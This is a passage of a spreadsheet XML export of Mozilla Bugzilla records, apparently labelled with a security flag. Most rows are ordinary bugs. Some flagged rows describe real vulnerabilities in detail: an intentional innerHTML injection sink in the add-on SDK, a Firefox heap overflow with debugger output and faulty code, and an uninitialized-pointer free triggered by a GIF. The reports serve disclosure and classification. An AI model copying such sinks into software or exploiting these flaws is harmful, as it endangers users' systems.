[task 2018-07-17T11:48:02.350Z]  0:51.76       file:/builds/worker/workspace/build/src/android-sdk-linux/extras/android/m2repository/com/google/android/gms/play-services-analytics/15.0.1/play-services-analytics-15.0.1.pom
[task 2018-07-17T11:48:02.350Z]  0:51.76       file:/builds/worker/workspace/build/src/android-sdk-linux/extras/android/m2repository/com/google/android/gms/play-services-analytics/15.0.1/play-services-analytics-15.0.1.jar
[task 2018-07-17T11:48:02.350Z]  0:51.76       http://localhost:8081/nexus/content/repositories/jcenter/com/google/android/gms/play-services-analytics/15.0.1/play-services-analytics-15.0.1.pom
[task 2018-07-17T11:48:02.350Z]  0:51.76       http://localhost:8081/nexus/content/repositories/jcenter/com/google/android/gms/play-services-analytics/15.0.1/play-services-analytics-15.0.1.jar
[task 2018-07-17T11:48:02.350Z]  0:51.76       http://localhost:8081/nexus/content/repositories/google/com/google/android/gms/play-services-analytics/15.0.1/play-services-analytics-15.0.1.pom
[task 2018-07-17T11:48:02.351Z]  0:51.76       http://localhost:8081/nexus/content/repositories/google/com/google/android/gms/play-services-analytics/15.0.1/play-services-analytics-15.0.1.jar
[task 2018-07-17T11:48:02.351Z]  0:51.76   Required by:
[task 2018-07-17T11:48:02.351Z]  0:51.76       project :app
[task 2018-07-17T11:48:02.351Z]  0:51.76 * Try:
[task 2018-07-17T11:48:02.351Z]  0:51.76 Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output.
[task 2018-07-17T11:48:02.351Z]  0:51.76 ==============================================================================
[task 2018-07-17T11:48:02.351Z]  0:51.76 2: Task failed with an exception.
[task 2018-07-17T11:48:02.351Z]  0:51.76 -----------
[task 2018-07-17T11:48:02.351Z]  0:51.76 * What went wrong:
[task 2018-07-17T11:48:02.351Z]  0:51.77 Could not resolve all files for configuration ':app:officialWithoutGeckoBinariesNoMinApiPhotonDebugAndroidTestRuntimeClasspath'.
[task 2018-07-17T11:48:02.351Z]  0:51.77 &gt; Could not find com.google.android.gms:play-services-analytics:15.0.1.</t>
        </is>
      </c>
      <c r="X4759" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4760">
      <c r="A4760" t="n">
        <v>1505591</v>
      </c>
      <c r="B4760" t="inlineStr">
        <is>
          <t>2018-11-07 14:08:34 -0800</t>
        </is>
      </c>
      <c r="C4760" t="inlineStr">
        <is>
          <t>update socorro.processor for Python 3</t>
        </is>
      </c>
      <c r="D4760" t="inlineStr">
        <is>
          <t>2018-11-09 11:56:32 -0800</t>
        </is>
      </c>
      <c r="E4760" t="n">
        <v>1</v>
      </c>
      <c r="F4760" t="n">
        <v>1</v>
      </c>
      <c r="G4760" t="n">
        <v>4</v>
      </c>
      <c r="H4760" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4760" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4760" t="inlineStr">
        <is>
          <t>Processor</t>
        </is>
      </c>
      <c r="K4760" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4760" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4760" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4760" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4760" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4760" t="inlineStr"/>
      <c r="Q4760" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4760" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4760" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4760" t="n">
        <v>1</v>
      </c>
      <c r="U4760" t="n">
        <v>0</v>
      </c>
      <c r="V4760" t="n">
        <v>3</v>
      </c>
      <c r="W4760" t="inlineStr">
        <is>
          <t>We're switching to Python 3.
This covers getting the tests in socorro/unittest/processor/ passing in Python 3.</t>
        </is>
      </c>
      <c r="X4760" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4761">
      <c r="A4761" t="n">
        <v>1315435</v>
      </c>
      <c r="B4761" t="inlineStr">
        <is>
          <t>2016-11-04 23:15:57 -0700</t>
        </is>
      </c>
      <c r="C4761" t="inlineStr">
        <is>
          <t>Intentional XSS injection hole in add-ons SDK</t>
        </is>
      </c>
      <c r="D4761" t="inlineStr">
        <is>
          <t>2017-08-28 13:32:51 -0700</t>
        </is>
      </c>
      <c r="E4761" t="n">
        <v>1</v>
      </c>
      <c r="F4761" t="n">
        <v>1</v>
      </c>
      <c r="G4761" t="n">
        <v>6</v>
      </c>
      <c r="H4761" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4761" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J4761" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4761" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4761" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4761" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4761" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4761" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4761" t="inlineStr">
        <is>
          <t>[qa-][adv-main50.1+]</t>
        </is>
      </c>
      <c r="Q4761" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4761" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4761" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T4761" t="n">
        <v>1</v>
      </c>
      <c r="U4761" t="n">
        <v>0</v>
      </c>
      <c r="V4761" t="n">
        <v>31</v>
      </c>
      <c r="W4761" t="inlineStr">
        <is>
          <t>I honestly don't know if or how this exploitable, but the SDK bundles a world-accessible file with an intentional HTML injection vulnerability:
http://searchfox.org/mozilla-central/rev/f5c9e9a249637c9abd88754c8963ecb3838475cb/addon-sdk/source/lib/sdk/ui/frame/view.html#17
document.documentElement.innerHTML = atob(location.hash.substr(1));
This file is accessible to the entire web at resource://gre/modules/commonjs/sdk/ui/frame/view.html in the stock browser, and at various other locations in add-ons with bundled copies of the SDK. In the latter case, it can probably at the least be used to access the add-on's localStorage, or to trick unwary content scripts. It's probably exploitable in other ways too, though.</t>
        </is>
      </c>
      <c r="X4761" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4762">
      <c r="A4762" t="n">
        <v>579655</v>
      </c>
      <c r="B4762" t="inlineStr">
        <is>
          <t>2010-07-17 09:01:56 -0700</t>
        </is>
      </c>
      <c r="C4762" t="inlineStr">
        <is>
          <t>heap overflow in text runs - crash [@ nsTextFrameUtils::TransformText]</t>
        </is>
      </c>
      <c r="D4762" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:50 -0700</t>
        </is>
      </c>
      <c r="E4762" t="n">
        <v>1</v>
      </c>
      <c r="F4762" t="n">
        <v>1</v>
      </c>
      <c r="G4762" t="n">
        <v>3</v>
      </c>
      <c r="H4762" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4762" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4762" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4762" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4762" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4762" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4762" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4762" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4762" t="inlineStr">
        <is>
          <t>[sg:critical][critsmash:patch] [qa-examined-191]</t>
        </is>
      </c>
      <c r="Q4762" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4762" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4762" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4762" t="n">
        <v>1</v>
      </c>
      <c r="U4762" t="n">
        <v>0</v>
      </c>
      <c r="V4762" t="n">
        <v>30</v>
      </c>
      <c r="W4762" t="inlineStr">
        <is>
          <t>wooshi@gmail.com sent the following to the security alias:
Firefox exploitable Vulnerability
Discovery Date: May 24, 2010
Discovery By : wushi of team509
Systems Affected
This vulnerability affects the following software :
　　* mozilla firefox 3.6.6
Overview
firefox contains a vulnerability. This vulnerability may allow attackers
to remotely
execute arbitrary code on the affected system. Exploitation may occur as
the result of using the
affected webkit application to visit a website. The privileges gained by
a remote attacker depend on the software
component being attacked.
I. Description:
unpack the ff4.rar and got the 1.html , use mozilla firefox to open it(I
used
3.6.6 on windows xp sp3) firefox will crash.
the crash will like this:
(de8.9f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012b600 ebx=00000000 ecx=00000001 edx=0012daa5 esi=0012b620
edi=00130000
eip=101aca7a esp=0012b17c ebp=04c79a6a iopl=0 nv up ei pl nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010217
xul!nsTextFrameUtils::TransformText+0x5a:
101aca7a 8807 mov byte ptr [edi],al ds:0023:00130000=41
0:000&gt; kv
ChildEBP RetAddr Args to Child
0012b194 101545a0 04c761cc fffffffc 00000002
xul!nsTextFrameUtils::TransformText+0x5a (FPO: [Uses EBP] [5,4,0])
(CONV: cdecl)
[e:\builds\moz2_slave\win32_build\build\layout\generic\nstextframeutils.cpp
@ 220]
0012c74c 10137a0c 0012d7d8 0477b058 0012dab0
xul!BuildTextRunsScanner::BuildTextRunForFrames+0x3f0 (FPO: [Uses EBP]
[1,1380,4]) (CONV: thiscall)
[e:\builds\moz2_slave\win32_build\build\layout\generic\nstextframethebes.cpp
@ 1657]
0012d770 6165696f 0000005d 00000000 00000000
xul!BuildTextRunsScanner::FlushFrames+0xac (FPO: [Uses EBP] [1,1031,3])
(CONV: thiscall)
[e:\builds\moz2_slave\win32_build\build\layout\generic\nstextframethebes.cpp
@ 1215]
WARNING: Frame IP not in any known module. Following frames may be wrong.
0012d778 00000000 00000000 00000000 00000000 0x6165696f
check the source code, you can find this line cause the crash:
if (!nowInWhitespace) {
if (IsDiscardable(ch, &amp;flags)) {
aSkipChars-&gt;SkipChar();
nowInWhitespace = inWhitespace;
} else {
*aOutput++ = ch; ; error is here
aSkipChars-&gt;KeepChar();
}
notice the stack you can find aLength set to 0xfffffffc, it is a mistake.
check the xul!BuildTextRunsScanner::BuildTextRunForFrames' source code,
you can find the error is here:
nsIContent* content = f-&gt;GetContent();
const nsTextFragment* frag = content-&gt;GetText();
PRInt32 contentStart = mappedFlow-&gt;mStartFrame-&gt;GetContentOffset();
PRInt32 contentEnd = mappedFlow-&gt;GetContentEnd();
PRInt32 contentLength = contentEnd - contentStart; // error is here
in the test case, the contentEnd &lt; contentStart , so made the mistake
and firefox didn't check the number.</t>
        </is>
      </c>
      <c r="X4762" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4763">
      <c r="A4763" t="n">
        <v>2390</v>
      </c>
      <c r="B4763" t="inlineStr">
        <is>
          <t>1999-01-14 16:03:45 -0800</t>
        </is>
      </c>
      <c r="C4763" t="inlineStr">
        <is>
          <t>[PP] http://www.sportsline.com/: Only object that loads on page is the top table</t>
        </is>
      </c>
      <c r="D4763" t="inlineStr">
        <is>
          <t>1999-04-21 11:23:29 -0700</t>
        </is>
      </c>
      <c r="E4763" t="n">
        <v>1</v>
      </c>
      <c r="F4763" t="n">
        <v>1</v>
      </c>
      <c r="G4763" t="n">
        <v>3</v>
      </c>
      <c r="H4763" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4763" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4763" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K4763" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4763" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4763" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N4763" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4763" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4763" t="inlineStr"/>
      <c r="Q4763" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4763" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4763" t="inlineStr">
        <is>
          <t>M2</t>
        </is>
      </c>
      <c r="T4763" t="n">
        <v>1</v>
      </c>
      <c r="U4763" t="n">
        <v>0</v>
      </c>
      <c r="V4763" t="n">
        <v>8</v>
      </c>
      <c r="W4763" t="inlineStr">
        <is>
          <t>Using 1/14 build on Win 98.
Bring up URL.
Only object that loads on page is the top table</t>
        </is>
      </c>
      <c r="X4763" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4764">
      <c r="A4764" t="n">
        <v>1058786</v>
      </c>
      <c r="B4764" t="inlineStr">
        <is>
          <t>2014-08-26 11:09:00 -0700</t>
        </is>
      </c>
      <c r="C4764" t="inlineStr">
        <is>
          <t>Review Board shouldn't leak my full email address</t>
        </is>
      </c>
      <c r="D4764" t="inlineStr">
        <is>
          <t>2016-02-21 20:31:38 -0800</t>
        </is>
      </c>
      <c r="E4764" t="n">
        <v>1</v>
      </c>
      <c r="F4764" t="n">
        <v>1</v>
      </c>
      <c r="G4764" t="n">
        <v>6</v>
      </c>
      <c r="H4764" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4764" t="inlineStr">
        <is>
          <t>MozReview Graveyard</t>
        </is>
      </c>
      <c r="J4764" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4764" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L4764" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4764" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4764" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4764" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4764" t="inlineStr"/>
      <c r="Q4764" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4764" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4764" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4764" t="n">
        <v>1</v>
      </c>
      <c r="U4764" t="n">
        <v>0</v>
      </c>
      <c r="V4764" t="n">
        <v>52</v>
      </c>
      <c r="W4764" t="inlineStr">
        <is>
          <t>See:
https://reviewboard-dev.allizom.org/users/
As well as the per-user profile page.
Presuming an upstream issue, however IMO this still needs to be fixed before rolling it out more at Mozilla.</t>
        </is>
      </c>
      <c r="X4764" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4765">
      <c r="A4765" t="n">
        <v>39044</v>
      </c>
      <c r="B4765" t="inlineStr">
        <is>
          <t>2000-05-12 03:25:19 -0700</t>
        </is>
      </c>
      <c r="C4765" t="inlineStr">
        <is>
          <t>Some vers. of some browsers give a script warning on query page when not using milestones</t>
        </is>
      </c>
      <c r="D4765" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E4765" t="n">
        <v>1</v>
      </c>
      <c r="F4765" t="n">
        <v>1</v>
      </c>
      <c r="G4765" t="n">
        <v>4</v>
      </c>
      <c r="H4765" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4765" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4765" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4765" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4765" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4765" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N4765" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4765" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4765" t="inlineStr"/>
      <c r="Q4765" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4765" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4765" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T4765" t="n">
        <v>1</v>
      </c>
      <c r="U4765" t="n">
        <v>4</v>
      </c>
      <c r="V4765" t="n">
        <v>17</v>
      </c>
      <c r="W4765" t="inlineStr">
        <is>
          <t>This is the bugzilla 2.10 tarball.
(We once had milestones on, to test with for bugzilla 2.8, but we didn't do 
anything with them)
We now have milestones turned off.
The milestones table has '---' for each product.
The products table has '---' as the default milestone.
On IE4, windows 95, the query page gives a script error, saying :
line 223
char 16
eerror: 'target_milestone.length' is not an object
code: 0</t>
        </is>
      </c>
      <c r="X4765" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4766">
      <c r="A4766" t="n">
        <v>600539</v>
      </c>
      <c r="B4766" t="inlineStr">
        <is>
          <t>2010-09-29 07:37:18 -0700</t>
        </is>
      </c>
      <c r="C4766" t="inlineStr">
        <is>
          <t>Get some indexes</t>
        </is>
      </c>
      <c r="D4766" t="inlineStr">
        <is>
          <t>2011-06-23 09:29:15 -0700</t>
        </is>
      </c>
      <c r="E4766" t="n">
        <v>1</v>
      </c>
      <c r="F4766" t="n">
        <v>1</v>
      </c>
      <c r="G4766" t="n">
        <v>6</v>
      </c>
      <c r="H4766" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4766" t="inlineStr">
        <is>
          <t>Input</t>
        </is>
      </c>
      <c r="J4766" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4766" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4766" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4766" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4766" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4766" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4766" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q4766" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4766" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4766" t="inlineStr">
        <is>
          <t>1.9</t>
        </is>
      </c>
      <c r="T4766" t="n">
        <v>1</v>
      </c>
      <c r="U4766" t="n">
        <v>0</v>
      </c>
      <c r="V4766" t="n">
        <v>13</v>
      </c>
      <c r="W4766" t="inlineStr">
        <is>
          <t>Created attachment 479378
Brief EXPLAIN on homepage queries
I have seven queries run on my input homepage with no data.  All of those queries are "Using where" or the ghastly "Using where; Using temporary; Using filesort".
Temp filesort is bad news, using where is lame, and all those queries are going to be full table scans.
Doing Opinion.objects.all()[:10] from the shell on stage takes a full second (there's a hidden ORDER BY -created).  Stage's db has 434,000 opinion rows.</t>
        </is>
      </c>
      <c r="X4766" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4767">
      <c r="A4767" t="n">
        <v>510642</v>
      </c>
      <c r="B4767" t="inlineStr">
        <is>
          <t>2009-08-14 19:58:39 -0700</t>
        </is>
      </c>
      <c r="C4767" t="inlineStr">
        <is>
          <t>TM: Traced JSOP_BINDNAME is totally busted</t>
        </is>
      </c>
      <c r="D4767" t="inlineStr">
        <is>
          <t>2010-05-24 10:27:14 -0700</t>
        </is>
      </c>
      <c r="E4767" t="n">
        <v>1</v>
      </c>
      <c r="F4767" t="n">
        <v>1</v>
      </c>
      <c r="G4767" t="n">
        <v>3</v>
      </c>
      <c r="H4767" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4767" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4767" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4767" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4767" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4767" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4767" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4767" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4767" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4767" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4767" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4767" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T4767" t="n">
        <v>1</v>
      </c>
      <c r="U4767" t="n">
        <v>0</v>
      </c>
      <c r="V4767" t="n">
        <v>28</v>
      </c>
      <c r="W4767" t="inlineStr">
        <is>
          <t>(function () {
    var x;
    (eval("\
    (function () {\
        for (y in [0, 0]) let(a)((function () {\
            for (w in [0, 0])\
                x = 0\
        })());\
        with({}) {}\
    })\
    "))()
})()
crashes js opt shell from TM branch (31571:fc0bfd8bf9e9) with -j at js_CallIteratorNext near null and asserts dbg shell at Assertion failure: i &lt; fun-&gt;u.i.nvars, at ../jsfun.cpp:1000
autoBisect shows this is probably related to bug 495329 :
The first bad revision is:
changeset:   30697:60a9ef4e1a3d
user:        David Mandelin
date:        Mon Jul 27 18:13:53 2009 -0700
summary:     Bug 495329: Trace JSOP_BINDNAME/JSOP_SETNAME for closures, r=brendan</t>
        </is>
      </c>
      <c r="X4767" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4768">
      <c r="A4768" t="n">
        <v>441360</v>
      </c>
      <c r="B4768" t="inlineStr">
        <is>
          <t>2008-06-23 11:32:00 -0700</t>
        </is>
      </c>
      <c r="C4768" t="inlineStr">
        <is>
          <t>Crash [@ CoreFoundation@0x745a4 ] opening GIF file</t>
        </is>
      </c>
      <c r="D4768" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E4768" t="n">
        <v>1</v>
      </c>
      <c r="F4768" t="n">
        <v>1</v>
      </c>
      <c r="G4768" t="n">
        <v>3</v>
      </c>
      <c r="H4768" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4768" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4768" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4768" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L4768" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M4768" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4768" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4768" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4768" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4768" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4768" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4768" t="inlineStr">
        <is>
          <t>mozilla1.9</t>
        </is>
      </c>
      <c r="T4768" t="n">
        <v>1</v>
      </c>
      <c r="U4768" t="n">
        <v>0</v>
      </c>
      <c r="V4768" t="n">
        <v>16</v>
      </c>
      <c r="W4768" t="inlineStr">
        <is>
          <t>Created attachment 326343
Crashes Mac trunk.  May need to refresh several times.
Drew Yao from Apple Product Security reported this issue to security@mo.  The attached testcase crashes trunk on Mac (after ~2-5 refreshes), but not Windows or Linux, afaict.  The link to the Talkback report is provided above, and I'm doing a DEBUG build to hopefully provide a persistent call stack copy (should the Talkback report get deleted).
From Drew's email:
Free of uninitialized pointer in gfxQuartzSurface::~gfxQuartzSurface()
This probably only affects Mac OS X.  It does not seem to affect Firefox 2, only Firefox 3.
gfxQuartzSurface.cpp
gfxQuartzSurface::gfxQuartzSurface(const gfxSize&amp; size, gfxImageFormat format,
                                   PRBool aForPrinting)
    : mSize(size), mForPrinting(aForPrinting)
{
    unsigned int width = (unsigned int) floor(size.width);
    unsigned int height = (unsigned int) floor(size.height);
    if (!CheckSurfaceSize(gfxIntSize(width, height)))
        return;    &lt;-- the gif triggers a failure, causing a return before mCGContext is initialized
    cairo_surface_t *surf = cairo_quartz_surface_create
        ((cairo_format_t) format, width, height);
    mCGContext = cairo_quartz_surface_get_cg_context (surf);
    CGContextRetain(mCGContext);
    Init(surf);
}
...
gfxQuartzSurface::~gfxQuartzSurface()
{
    CGContextRelease(mCGContext); //&lt;-- an uninitialized pointer can be released, without ever having been retained.
}
To reproduce:
In Firefox 3 RC1 on Mac OS X 10.5.3 Intel,
open the attached gif file and refresh a few times. It should crash.
If you set the environment variable MallocScribble=1 first, it will always crash in CFRelease accessing 0xaaaaaaaa, indicating that it's trying to free uninitialized heap memory.  man malloc to see the behavior of MallocScribble.  It also does what MallocPreScribble claims to do.
Process:         firefox-bin [55007]
Path:            /Volumes/data_apps/obj-i386-apple-darwin9.3.0/dist/MinefieldDebug.app/Contents/MacOS/firefox-bin
Identifier:      org.mozilla.firefox
Version:         3.0pre (3.0pre)
Code Type:       X86 (Native)
Parent Process:  launchd [1]
Date/Time:       2008-06-05 16:19:58.990 -0700
OS Version:      Mac OS X 10.5.3 (9D34)
Report Version:  6
Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x00000000aaaaaaaf
Crashed Thread:  0
Thread 0 Crashed:
0   com.apple.CoreFoundation          0x955f15a4 CFRelease + 36
1   libthebes.dylib                   0x12132afb gfxQuartzSurface::~gfxQuartzSurface() + 41
2   libthebes.dylib                   0x1211632e gfxASurface::Release() + 182 (gfxASurface.cpp:102)
3   libgkgfxthebes.dylib              0x120db328 nsRefPtr&lt;gfxASurface&gt;::~nsRefPtr() + 28
4   libgkgfxthebes.dylib              0x120de88a nsThebesImage::Draw(nsIRenderingContext&amp;, gfxRect const&amp;, gfxRect const&amp;, gfxRect const&amp;) + 2318 (nsThebesImage.cpp:515)
5   libgklayout.dylib                 0x122eb9ff nsLayoutUtils::DrawImage(nsIRenderingContext*, imgIContainer*, nsRect const&amp;, nsRect const&amp;, nsRect const*) + 2569 (nsLayoutUtils.cpp:2618)
6   libgklayout.dylib                 0x1237eb68 nsImageFrame::PaintImage(nsIRenderingContext&amp;, nsPoint, nsRect const&amp;, imgIContainer*) + 326 (nsImageFrame.cpp:1185)
7   libgklayout.dylib                 0x1237ecad nsDisplayImage::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) + 95 (nsImageFrame.cpp:1167)
8   libgklayout.dylib                 0x122c0b91 nsDisplayList::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) const + 61 (nsDisplayList.cpp:295)
9   libgklayout.dylib                 0x122c1dbb nsDisplayWrapList::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) + 41 (nsDisplayList.cpp:694)
10  libgklayout.dylib                 0x122c2a50 nsDisplayClip::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) + 128 (nsDisplayList.cpp:888)
...
By filling the heap, an attacker may be able to control the pointer that gets freed, potentially leading to memory corruption and/or arbitrary code execution.</t>
        </is>
      </c>
      <c r="X4768" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4769">
      <c r="A4769" t="n">
        <v>816613</v>
      </c>
      <c r="B4769" t="inlineStr">
        <is>
          <t>2012-11-29 10:55:41 -0800</t>
        </is>
      </c>
      <c r="C4769" t="inlineStr">
        <is>
          <t>JavaScript AST should contain source location for each object</t>
        </is>
      </c>
      <c r="D4769" t="inlineStr">
        <is>
          <t>2015-10-19 07:46:56 -0700</t>
        </is>
      </c>
      <c r="E4769" t="n">
        <v>1</v>
      </c>
      <c r="F4769" t="n">
        <v>1</v>
      </c>
      <c r="G4769" t="n">
        <v>5</v>
      </c>
      <c r="H4769" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4769" t="inlineStr">
        <is>
          <t>L20n</t>
        </is>
      </c>
      <c r="J4769" t="inlineStr">
        <is>
          <t>JS Library</t>
        </is>
      </c>
      <c r="K4769" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4769" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4769" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4769" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4769" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
